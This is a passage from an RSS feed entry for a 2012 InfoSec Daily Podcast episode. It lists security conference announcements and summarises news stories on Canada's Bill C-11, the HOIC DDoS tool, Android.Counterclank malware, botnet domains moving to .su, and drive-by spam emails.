	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.petitiononlinecanada.com/petition/canadians-against-bill-c11-the-copyright-modernization-act/362"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.petitiononlinecanada.com/petition/canadians-against-bill-c11-the-copyright-modernization-act/362</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Do you want to be labelled a criminal for copying songs off a CD that you have purchased onto your iPod? With the aforementioned bill, you will be&#8230;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The current Canadian government wants to pass Bill C-11 (of the formerly defunct Bill C-32) under the guise of modernization of our current copyright laws. What this bill fails to do is keep any modern consumer in mind.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">With the current language of the bill regarding &quot;digital locks&quot; or DRM to many of you, the passing of the bill label most of you criminals.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Potential criminals? With severe fines? for the following actions that many of the current generation of computer literate consumers do:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- Copying a song off a CD that you have purchased to your iPod or cell phone to listen to on your commute to work?</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- Copying a movie off a DVD or Blu-Ray that you have purchased to your cellphone or tablet to watch while waiting in line at the cash register?</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- Copying a CD, DVD or Blu-Ray disc that you have purchased in order to prevent your young children from scratching the original disc? (something I&#39;m sure that has happen to many a parent including this one)</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Do these actions sound criminal to you?</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In our current economic climate, do most of us have so much disposable income that we can purchase the same song over and over again? In different formats so that we can listen to it in our car, iPod, cell phone, computer, and home stereo?</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Copyright modernization need to keep the modern consumer in mind, and need to include fair use and common sense.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please make your voice against Bill C-11 known to the current Canadian federal government. You can start by signing this petition, and writing to the Prime Minister&#39;s office: pm@pm.gc.ca and the Industry Minister: </span><a href="mailto:christian.paradis@parl.gc.ca"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">christian.paradis@parl.gc.ca</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Geordy&rsquo;s Comments:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;It seems like the SOPA problem is worldwide. The world is not seeing the wool pulled over their eyes. &nbsp;I could not find a single news article that mentioned SOPA, ACTA and Bill C-11 and called them all out for the crock of shit they are.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Beau&rsquo;s Comments:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Yep, Spain just passed a similar bill with considerable pressure from the US. And from The Guardian: &ldquo;The UK and 21 other European Union member states on Thursday signed an international copyright agreement treaty called ACTA sparking more demonstrations by Internet users who have protested for days both virtually and physically over fear it will lead to online censorship.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://blog.spiderlabs.com/2012/01/hoic-ddos-analysis-and-detection.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.spiderlabs.com/2012/01/hoic-ddos-analysis-and-detection.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a previous blog post, we provided details of a DDoS attack tool called LOIC (Low Orbit Ion Canon) used by Anonymous in supports of denial of service attacks over the past year.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attackers are constantly changing their tactics and tools in response to defender&#39;s actions. &nbsp;Recently, the SANS Internet Storm Center (ISC) also highlighted a javascript verion of LOIC</span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">that, while generating the same attack traffic as our previous analysis showed, actually executed the attacks without the user &quot;initiating&quot; the attacks by pressing any buttons.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SpiderLabs has identified a new DDoS attack tool in circulation called HOIC (High Orbit Ion Canon).</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><a href="http://www.symantec.com/connect/fr/blogs/androidcounterclank-found-official-android-market"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.symantec.com/connect/fr/blogs/androidcounterclank-found-official-android-market</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Symantec has identified multiple publisher IDs on the Android Market that are being used to push out</span><a href="http://www.symantec.com/security_response/writeup.jsp?docid=2012-012709-4046-99"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Android.Counterclank</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. This is a minor modification of</span><a href="http://www.symantec.com/security_response/writeup.jsp?docid=2011-061012-4545-99"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Android.Tonclank</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a bot-like threat that can receive commands to carry out certain actions, as well as steal information from the device.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For each of these malicious applications, the malicious code has been grafted on to the main application in a package called &ldquo;apperhand&rdquo;. When the package is executed, a service with the same name may be seen running on a compromised device. Another sign of an infection is the presence of the Search icon above on the home screen.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The combined download figures of all the malicious apps indicate that Android.Counterclank has the highest distribution of any malware identified so far this year.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.abuse.ch/?p=3581"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.abuse.ch/?p=3581</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">During the past few years the Top Level Domain (TLD) </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.ru</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> has been heavily abused by cybercriminals. According to ZeuS Tracker, TLD .ru was one of the most abused Top Level Domains that were used by criminals to run ZeuS botnet controllers.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Top Level Domain .ru is managed by the </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Coordination Center for TLD RU</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (</span><a href="http://www.cctld.ru/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">cctld.ru</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">). CCTLD.ru finally did their job well and addressed the reputation problem TLD.ru had by setting up </span><a href="http://cctld.ru/en/docs/rules.php"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">new terms and conditions</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> for domain name registration of </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.ru </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">domains which came into force on November 11 2011.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In fact this means that a registrar can terminate a domain name when it is being used for phising attacks or when it is being used to control a botnet.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, what I can say so far is that the number of fraudulent .ru domains used by ZeuS botnet herders decreased in the beginning of 2012. I can also see that malicious .ru domains which are being added to ZeuS Tracker have a much shorter life span. While malicious .ru domains used to stay active for several weeks or months in the past, they are now getting nuked much faster (mostly within 4-24hrs). That&rsquo;s great news for the internet community!</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unfortunately we all know that there is a never ending cat and mouse game between the security industry / infosec community and cybercriminals. Criminals have already noticed that their domains are getting shut down much faster. So they started to look for another TLD to use for their dirty business and found a TLD that nearly has been forgotten:</span><a href="https://en.wikipedia.org/wiki/.su"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">the TLD .su</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.darkreading.com/security/attacks-breaches/232500660/new-drive-by-spam-infects-those-who-open-email-no-attachment-needed.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/security/attacks-breaches/232500660/new-drive-by-spam-infects-those-who-open-email-no-attachment-needed.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attackers have developed a new way to infect your PC through email &#8212; without forcing you to click on an attachment.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to researchers at eleven, a German security firm, the new drive-by spam automatically downloads malware when an email is opened in the email client. The user doesn&#39;t have to click on a link or open an attachment &#8212; just opening the email is enough.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The new generation of email-borne malware consists of HTML e-mails which contain a JavaScript which automatically downloads malware when the email is opened,&quot; eleven says in a news release.&quot;This is similar to so-called drive-by downloads, which infect a PC by opening an infected website in the browser.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The current wave of drive-by spam contains the subject &quot;Banking security update&quot; and has a sender address with the domain fdic.com. If the email client allows HTML emails to be displayed, the HTML code is immediately activated.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-581-the-big-picture-hoic-the-clanks-ru-abused-no-click-pwnage/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3429/0/infosec-daily-podcast-episode-581.mp3" length="20792360" type="audio/mpeg" />
		<itunes:duration>0:43:16</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 581 for January 30, 2012.&#160;&#160; Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Karthik Rangarajan, and Beau Woods.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 581 for January 30, 2012.&#160;&#160; Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Karthik Rangarajan, and Beau Woods.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Subcommittee Markup: H.R. 3674, PrECISE Act of 2011
	When: February 1, 2012
	Where: 311 Cannon House Office Building, Washington, DC (also live streaming)
	http://homeland.house.gov/markup/subcommittee-markup-hr-3674
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.petitiononlinecanada.com/petition/canadians-against-bill-c11-the-copyright-modernization-act/362
&#160;
Do you want to be labelled a criminal for copying songs off a CD that you have purchased onto your iPod? With the aforementioned bill, you will be&#8230;
&#160;
The current Canadian government wants to pass Bill C-11 (of the formerly defunct Bill C-32) under the guise of modernization of our current copyright laws. What this bill fails to do is keep any modern consumer in mind.
&#160;
With the current language of the bill regarding &#34;digital locks&#34; or DRM to many of you[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
